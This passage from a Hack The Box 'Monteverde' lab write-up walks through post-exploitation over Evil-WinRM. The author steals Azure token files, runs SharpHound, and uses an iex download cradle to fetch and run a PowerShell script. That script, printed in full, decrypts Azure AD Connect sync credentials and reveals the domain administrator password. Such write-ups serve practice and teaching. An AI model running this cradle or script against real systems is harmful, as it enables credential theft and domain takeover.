Logons Count : 0
Password Last Set : 1/3/2020 6:09:21 AM



https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\mhope\.azure\TokenCache.dat (Azure Token Cache)
Accessed:1/3/2020 5:36:14 AM -- Size:7896

C:\Users\mhope\.azure\AzureRMContext.json (Azure RM Context)
Accessed:1/3/2020 5:35:57 AM -- Size:2794

18. Not much of interest, but a few Azure configuration files were found in the current user's profile directory

*Evil-WinRM* PS C:\Users\mhope\Desktop> cd C:\Users\mhope\.azure\
*Evil-WinRM* PS C:\Users\mhope\.azure> ls


Directory: C:\Users\mhope\.azure


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2020 5:35 AM ErrorRecords
-a---- 1/3/2020 5:31 AM 34 AzurePSDataCollectionProfile.json
-a---- 1/3/2020 5:35 AM 2794 AzureRmContext.json
-a---- 1/3/2020 5:31 AM 191 AzureRmContextSettings.json
-a---- 1/3/2020 5:36 AM 7896 TokenCache.dat


*Evil-WinRM* PS C:\Users\mhope\.azure>
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzurePSDataCollectionProfile.json

Info: Downloading C:\Users\mhope\.azure\AzurePSDataCollectionProfile.json to AzurePSDataCollectionProfile.json

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzureRmContext.json

Info: Downloading C:\Users\mhope\.azure\AzureRmContext.json to AzureRmContext.json

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure>
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzureRmContextSettings.json

Info: Downloading C:\Users\mhope\.azure\AzureRmContextSettings.json to AzureRmContextSettings.json

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> download TokenCache.dat

Info: Downloading C:\Users\mhope\.azure\TokenCache.dat to TokenCache.dat

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure>

http:\sh1yan.top\photo\Monteverde-htb-writeup/111.txt.json

19. Unfortunately my skills are lacking and I didn't find anything, so I uploaded the BloodHound collector to enumerate

*Evil-WinRM* PS C:\Users\mhope\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe

Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\mhope\Desktop\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Desktop> .\SharpHound.exe -c all -d MEGABANK.LOCAL
2024-05-11T02:37:34.9091996-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-05-11T02:37:35.0185807-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-11T02:37:35.0343284-07:00|INFORMATION|Initializing SharpHound at 2:37 AM on 5/11/2024
2024-05-11T02:37:37.7060717-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for MEGABANK.LOCAL : MONTEVERDE.MEGABANK.LOCAL
2024-05-11T02:37:38.0341967-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-11T02:37:38.1279490-07:00|INFORMATION|Beginning LDAP search for MEGABANK.LOCAL
2024-05-11T02:37:38.1592002-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-05-11T02:37:38.1592002-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-05-11T02:38:08.1748588-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-05-11T02:38:23.4560715-07:00|INFORMATION|Consumers finished, closing output channel
2024-05-11T02:38:23.4716995-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-05-11T02:38:23.5810726-07:00|INFORMATION|Status: 121 objects finished (+121 2.688889)/s -- Using 43 MB RAM
2024-05-11T02:38:23.5810726-07:00|INFORMATION|Enumeration finished in 00:00:45.4458643
2024-05-11T02:38:23.6279476-07:00|INFORMATION|Saving cache with stats: 79 ID to type mappings.
79 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-05-11T02:38:23.6435734-07:00|INFORMATION|SharpHound Enumeration Completed at 2:38 AM on 5/11/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


Directory: C:\Users\mhope\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/11/2024 2:38 AM 13457 20240511023823_BloodHound.zip
-a---- 5/11/2024 2:38 AM 11927 MmU4ODNmNTctYjM2MS00N2U1LWI5NjctNDg2N2E5YmZmZmEx.bin
-a---- 5/11/2024 2:31 AM 276992 Rubeus.exe
-a---- 5/11/2024 2:36 AM 1046528 SharpHound.exe
-ar--- 5/10/2024 11:57 PM 34 user.txt
-a---- 5/11/2024 2:04 AM 2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\mhope\Desktop> download 20240511023823_BloodHound.zip

Info: Downloading C:\Users\mhope\Desktop\20240511023823_BloodHound.zip to 20240511023823_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\Desktop>

20. After analysing all of it, there seemed to be no path here, so I went back to the privileged group found at the beginning

Azure Admins

https://book.hacktricks.xyz/v/cn/windows-hardening/windows-local-privilege-escalation

Monteverde is a medium-difficulty Windows machine featuring Azure AD Connect. Enumerate the domain and create a user list. Through password spraying, the "SABatchJobs" service account is found to use its username as its password. With this service account it is possible to enumerate the SMB shares on the system, and the "$users" share is found to be world-readable. An XML file used for an Azure AD account is located in a user folder and contains a password. Due to password reuse, we can connect to the domain controller over WinRM as "mhope". Enumeration shows that "Azure AD Connect" is installed. It is possible to extract the credentials of the account that replicates directory changes to Azure (in this case the default domain administrator).

21. The steps below are the exploitation steps. I couldn't do this myself, having never encountered it before, so I could only follow the walkthrough.

*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\"Program Files"
*Evil-WinRM* PS C:\Program Files> ls *Azure*


Directory: C:\Program Files


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync


*Evil-WinRM* PS C:\Program Files>


https://blog.xpnsec.com/azuread-connect-for-redteam/


iex(new-object net.webclient).downloadstring('http://10.10.14.16/Get-MSOLCredentials.ps1')


┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Get-MSOLCredentials.ps1
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)



┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.172 - - [12/May/2024 04:31:52] "GET /Get-MSOLCredentials.ps1 HTTP/1.1" 200 -



*Evil-WinRM* PS C:\Program Files> cd C:\Users\mhope\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.16/Get-MSOLCredentials.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop>

http:\sh1yan.top\photo\Monteverde-htb-writeup/Get-MSOLCredentials.ps1

22. From this exploitation we obtained the final credentials, so let's grab the last flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/10/2024 11:57 PM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6f9d52cc95e11d46a4ac2aa7b85ae634
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/223


Monteverde-htb-writeup
https://sh1yan.top/2024/05/11/Monteverde-htb-writeup/
Author: shiyan
Published on: May 11, 2024